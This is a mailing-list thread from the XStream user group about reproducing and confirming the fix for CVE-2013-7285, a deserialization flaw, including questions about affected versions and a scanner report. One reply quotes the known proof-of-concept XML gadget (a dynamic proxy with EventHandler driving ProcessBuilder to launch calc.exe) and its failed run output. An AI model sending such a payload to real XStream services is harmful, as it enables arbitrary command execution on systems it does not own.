CVE-2013-7285 - What is the correct way to reproduce?

[Dwouglas Mhagnum]

I followed the steps defined here
http://x-stream.github.io/CVE-2013-7285.html#reproduction
but without success.

XStream versions: 1.3.1 and 1.4.10
Java 8

Tks!

[Jörg Schaible]

Hi,

the article states clearly, which versions are affected. So there's no wonder, that you cannot reproduce it
with version 1.4.10.

So, what did you do exactly?

Cheers,
Jörg

[Luy Bai]

Hi,

I'm wondering if this vulnerability is fixed or not in 1.4.11.1, please refer to https://nvd.nist.gov/vuln/detail/CVE-2013-7285

Thanks.

[Bazil]

Hi

I used TreeSet as a class field to implement a set of nested elements, so a vulnerability warning was issued.
I solved this problem simply by registering CollectionConverter

Thanks

чт, 24 окт. 2019 г. в 14:27, Luy Bai <bly8...@gmail.com>:

--
You received this message because you are subscribed to the Google Groups "XStream User" group.
To unsubscribe from this group and stop receiving emails from it, send an email to xstream-user...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/xstream-user/7afa7823-48a0-4e77-a828-61fe4e45405a%40googlegroups.com.

[Jörg Schaible]

On Thu, 24 Oct 2019 00:27:02 -0700 Luy Bai wrote:

> Hi,
>
> I'm wondering if this vulnerability is fixed or not in 1.4.11.1, please
> refer to https://nvd.nist.gov/vuln/detail/CVE-2013-7285

Which part of this is unclear?
x-stream.github.io/CVE-2013-7285.html#affected_versions

- Jörg

[Jörg Schaible]

On Thu, 24 Oct 2019 20:07:19 +0700 Bazil wrote:

> Hi
>
> I used TreeSet as a class field to implement a set of nested elements,
> so a vulnerability warning was issued.
> I solved this problem simply by registering CollectionConverter

this is completely unrelated and has nothing to do with a CVE

>
> Thanks
>
> чт, 24 окт. 2019 г. в 14:27, Luy Bai
> <bly8...@gmail.com>:
>
>> Hi,
>>
>> I'm wondering if this vulnerability is fixed or not in 1.4.11.1, please
>> refer to https://nvd.nist.gov/vuln/detail/CVE-2013-7285

[snip]

[Luy Bai]

Hi,

We are using Anchore to scan the docker image and got a report that the vulnerability was detected, I can understand the statements from x-stream.github.io/CVE-2013-7285.html#affected_versions . 

I want to double-check the  1.4.11.1 version has fixed the vulnerability already.

Can you please confirm this?

Thanks.

[Bazil]

Hi,

I don't quite understand what you want from me
I did like this

public class CVE20137285 {

    static class ContactImpl implements Contact{

        @Override
        public String getName() {
            return "Vasya";
        }

        @Override
        public String getLastname() {
            return "Pupkin";
        }
       
    }
    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        XStream xstream = new XStream();
        String xml = xstream.toXML(new ContactImpl());
        Contact contact = (Contact)xstream.fromXML(xml);
        System.out.println(contact.getName());
    }
   
}

got it

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by com.thoughtworks.xstream.core.util.Fields (file:/C:/Temp/xstream-1.4.11.1/lib/xstream-1.4.11.1.jar) to field java.util.TreeMap.comparator
WARNING: Please consider reporting this to the maintainers of com.thoughtworks.xstream.core.util.Fields
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Security framework of XStream not initialized, XStream is probably vulnerable.
Vasya

  I did like this:

    public static void main(String[] args) {
        XStream xstream = new XStream();
        String xml = "<contact>\n" +
"  <dynamic-proxy>\n" +
"    <interface>org.company.model.Contact</interface>\n" +
"    <handler class='java.beans.EventHandler'>\n" +
"      <target class='java.lang.ProcessBuilder'>\n" +
"        <command>\n" +
"          <string>calc.exe</string>\n" +
"        </command>\n" +
"      </target>\n" +
"      <action>start</action>\n" +
"    <handler>\n" +
"  </dynamic-proxy>\n" +
"</contact>";
        Contact contact = (Contact)xstream.fromXML(xml);
        System.out.println(contact.getName());
    }

got it:

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by com.thoughtworks.xstream.core.util.Fields (file:/C:/Temp/xstream-1.4.11.1/lib/xstream-1.4.11.1.jar) to field java.util.TreeMap.comparator
WARNING: Please consider reporting this to the maintainers of com.thoughtworks.xstream.core.util.Fields
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Security framework of XStream not initialized, XStream is probably vulnerable.
Exception in thread "main" com.thoughtworks.xstream.mapper.CannotResolveClassException: contact
at com.thoughtworks.xstream.mapper.DefaultMapper.realClass(DefaultMapper.java:81)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.DynamicProxyMapper.realClass(DynamicProxyMapper.java:55)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.PackageAliasingMapper.realClass(PackageAliasingMapper.java:88)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.ClassAliasingMapper.realClass(ClassAliasingMapper.java:79)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.ArrayMapper.realClass(ArrayMapper.java:74)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.SecurityMapper.realClass(SecurityMapper.java:71)
at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
at com.thoughtworks.xstream.mapper.CachingMapper.realClass(CachingMapper.java:47)
at com.thoughtworks.xstream.core.util.HierarchicalStreams.readClassType(HierarchicalStreams.java:29)
at com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller.java:133)
at com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarshal(AbstractTreeMarshallingStrategy.java:32)
at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1487)
at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1467)
at com.thoughtworks.xstream.XStream.fromXML(XStream.java:1338)
at com.thoughtworks.xstream.XStream.fromXML(XStream.java:1329)
at cve.pkg2013.pkg7285.CVE20137285.main(CVE20137285.java:47)
C:\Users\ingen\AppData\Local\NetBeans\Cache\11.1\executor-snippets\run.xml:111: The following error occurred while executing this line:
C:\Users\ingen\AppData\Local\NetBeans\Cache\11.1\executor-snippets\run.xml:68: Java returned: 1

 

is this enough or is it again not what you need?

пн, 28 окт. 2019 г. в 16:26, Luy Bai <bly8...@gmail.com>:

--
You received this message because you are subscribed to the Google Groups "XStream User" group.
To unsubscribe from this group and stop receiving emails from it, send an email to xstream-user...@googlegroups.com.

To view this discussion on the web visit https://groups.google.com/d/msgid/xstream-user/29f1d644-ba96-42f2-aa95-782aff1d8795%40googlegroups.com.

[Jörg Schaible]

Hi Bazil,

On Monday, 28. October 2019, 14:58:48 CET write Bazil:

> Hi,
> I don't quite understand what you want from me

[snip]

Then stop writing rubbish. Your examples has absolutely nothing to do with any
reported CVE.

Regards,
Jörg